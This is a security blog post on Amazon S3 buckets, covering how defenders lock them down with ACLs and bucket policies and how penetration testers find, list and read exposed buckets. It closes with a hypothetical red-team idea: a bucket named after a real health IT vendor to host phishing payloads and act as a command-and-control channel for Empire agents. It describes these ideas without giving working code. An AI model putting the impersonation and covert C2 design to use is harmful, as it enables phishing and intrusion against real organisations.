S3 Buckets for Good and Evil

Amazon’s S3 buckets have been a hot topic lately and are worth taking a look at from both a red and blue perspective. Just last week, poor S3 bucket access control management has led to Verizon exposing approximately 14 million customer records, including customer service PINs. Just before that, a GOP analytics firm exposed 198 million voter records the same way. This isn’t a case of default settings being overlooked; S3 bucket access is restricted exclusively to the owner by default. Botching internal share folder access is one thing (that is often mismanaged), but botching what amounts to a “cloud” share folder is another.

Defending Your Buckets

There are two ways to lock down your S3 buckets: the user friendly Access Control List (ACL) and a less user friendly Bucket Policy. The ACL (Figure 1) is going to be familiar to anyone who has looked at a Windows NTFS ACL. It allows you to specify access controls for specific AWS users, any authenticated AWS user, and everyone (i.e., any user on the internet). The default settings are the owner having read/write to both object access and permissions access, objects being files stored in the bucket and permissions being the ACLs themselves. With permissions access you can read/write the bucket’s ACL! This is a good place to start any S3 bucket audits.

Screen Shot 2017-07-18 at 8.18.56 PM
Figure 1: Bucket Access Control List

The Bucket Policy is much more involved, but provides much more granularity by using a JSON-based access policy language. Figure 2 is an example of what this looks like. The Bucket Policy allows you to specify permissions and conditions to apply to specific resources and principals. An example of the granularity by the Bucket Policy compared to using the ACLs is that ACL write access provides create, overwrite, and delete permissions. In the Bucket Policy, you assign those rights individually using DeleteObject and PutObject.

6
Figure 2: Example Bucket Policy that allows access only from 54.240.143.0/24 and excludes 54.240.143.188 (taken from Amazon S3 documentation)

I recommend:

Ignoring the ACL and using the Bucket Policy for any granted access. The main reason for this is granularity. For example, if you want to provide read access to objects to everyone, using the ACL also gives them the ability to list all objects in your bucket. With the Bucket Policy, you can give only GetObject permissions to everyone, so they must have the exact URL to access objects.

Exercising the Principle of Least Access.  Provide access to objects ONLY as required by your business needs. Does everyone need to access this data? Does it make sense to limit access to corporate IP addresses? Who specifically needs the ability to list objects in your bucket outside of the AWS console?

Testing your access controls. Spot-checking changes you have made to bucket permissions is the right thing to do. Double-check your changes to make sure you haven’t opened up access to Everyone by accident. Test access as an anonymous use and as an authenticated AWS user not in your organization. Review your Bucket Policies. Curl a sample of bucket objects periodically to make sure things are in order.

Resources:
Permissions
Conditions
Example Policies

Bucket Reconnaissance

AWS provides a command line tool for managing AWS buckets. It can be used to list, copy, move, and delete files. It also lets you view object ACLs and bucket policies/ACLs. The tool uses basic API calls that we can use with other tools, Empire Agents, Cobalt Strike Beacons, Meterpreter Sessions, etc.

Most buckets are used to simply host files that a web server will point a client to for downloads; however, sometimes data is placed where it shouldn’t be. As you saw in the last section, sometimes ACLs and Bucket Policies are given more than a passing glance. S3 Buckets could hold data that is useful for penetration testing purposes. Let’s take a look at how you can find and evaluate buckets.

Bucket enumeration is done through OSINT or by brute forcing bucket names. For OSINT it is all about finding links to S3 buckets in web applications, Github, StackOverflow, etc. Rapid7 did a post on their research surrounding S3 buckets several years ago. They used a combination of observed bucket names from OSINT and brute forced lists of top companies and websites.

Once a target bucket is identified, there are a series of API calls that you can use to enumerate information on the bucket and its objects. Below are useful commands in the AWS CLI tool along with the web requests/responses that go along with them. Keep in mind that ACLs and Bucket Policies differentiate between anonymous access and authenticated AWS accounts (ANY AWS account).

List Objects

This is a good way to enumerate whether a bucket exists and will return a list of objects in that bucket if you have the permission to do so.

Success:
Screen Shot 2017-07-18 at 8.15.44 PM
Screen Shot 2017-07-18 at 8.25.12 PMScreen Shot 2017-07-18 at 8.25.19 PM

Fail:
Screen Shot 2017-07-18 at 8.16.02 PM
Screen Shot 2017-07-18 at 8.25.26 PM
Screen Shot 2017-07-18 at 8.25.33 PM

GET/PUT Objects

Basic commands/calls to download and upload files from/to the bucket.

GET:

Screen Shot 2017-07-18 at 8.16.15 PM
Screen Shot 2017-07-18 at 8.26.25 PMScreen Shot 2017-07-18 at 8.25.49 PM

PUT:
Screen Shot 2017-07-18 at 8.16.41 PM
Screen Shot 2017-07-18 at 8.25.57 PM

Get Bucket Permissions

These are used to get the Bucket ACL and Bucket Policy (get-bucket-acl and get-bucket-policy). This can be useful a couple of ways. It allows you to see what permissions you have, permissions others have, and usernames you could target with social engineering to escalate access. Maybe the bucket owner has some juicy data in their Github account.  

Screen Shot 2017-07-18 at 8.16.48 PM
Screen Shot 2017-07-18 at 8.26.05 PM

NOTE: Append ‘?policy’ to the path to query the Bucket Policy

Screen Shot 2017-07-18 at 8.26.15 PM

Get Object Permissions

Like before, but for specific objects. Maybe you don’t have permissions for the bucket, but you do have permissions to a specific folder inside the bucket.

Screen Shot 2017-07-18 at 8.17.10 PM
Screen Shot 2017-07-18 at 8.26.25 PM
Screen Shot 2017-07-18 at 8.26.32 PM

Attacking with Buckets

There are some interesting attacker minded use cases I have been playing with in my head based on some of S3’s bucket features. What caught my eye was the bucket names and how they show in the request URL. Below is an example of how a request is made to the powershell.txt file stored at the root of a given bucket:

 http://.s3.amazonaws.com/powershell.txt

For this section, let’s say you have been hired to perform a penetration test on a medical provider. With this bucket name, and subsequent URL, scheme, there is no name validation happening, other than checking to see if the bucket name exists. I will use my bucket name to appear as a health information technology solution.  A quick search will give you a good list of health information technology solutions to pick from. I am going to use Cerner in this hypothetical scenario. I register “cerner.com”, Cerner’s domain, as my bucket name. All requests to this bucket are made to

 http://cerner.com.s3.amazonaws.com

1
Figure 3: Creating a new bucket

I found this to be very interesting for social engineering purposes. You get around categorization issues and have an inherently trustworthy platform to deliver your payload, export data, or use as a C2 channel. At this point we have notionally setup a phishing campaign that plays on Cerner that involves an link to an OLE embedded Office document in our S3 bucket.

Taking this a step further, I think it would be fun to imagine what it might look like to use this bucket as a C2 channel for Empire. We have the ability to granularly allow anonymous reading and writing to the bucket root or any subfolders we like. In order to protect our attack infrastructure, our Bucket Policy might look something like this:

7
Figure 4: Policies for agents

8
Figure 5: Policies for Empire server

Figure 4 breakdown by policy:

Figure 5 breakdown by policy:

With these policies in place, no one outside of the specified IP addresses will have any permissions to our bucket. Agents in the target organization can contact the appropriate bucket sub folders to PUT and GET C2 communications, but cannot list objects. Any requests without the specified user agent will get nothing. PUT and GET referring to simple HTTP PUT and GET requests to the specified folders. No AWS tools needed. AWS also lets you do cool l33t hacker things in this scenario like get text messages when an Agent stages using SNS topics (Figure 6). I am no longer in the traveling pentester consultant game, so I have no need to build something like this out, but it would be cool to see if anyone does.

9
Figure 6: Get a text when someone executes your payload

Conclusion

S3 buckets can be a lucrative place to focus some time on if you discover the organization you are pentesting is using it. It can also be a useful tool in all phases of a penetration test/red team engagement depending on how it fits your team’s needs. As far as toolsets go, the AWS CLI tool is a good place to start. It is built with boto, an AWS SDK for Python. An offensive toolset named AWS_PWN was created with boto. For defenders, S3 buckets should be treated as what they are: public-facing share folders. Audit them periodically and review Bucket Policies and ACL settings prior to new bucket implementation.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s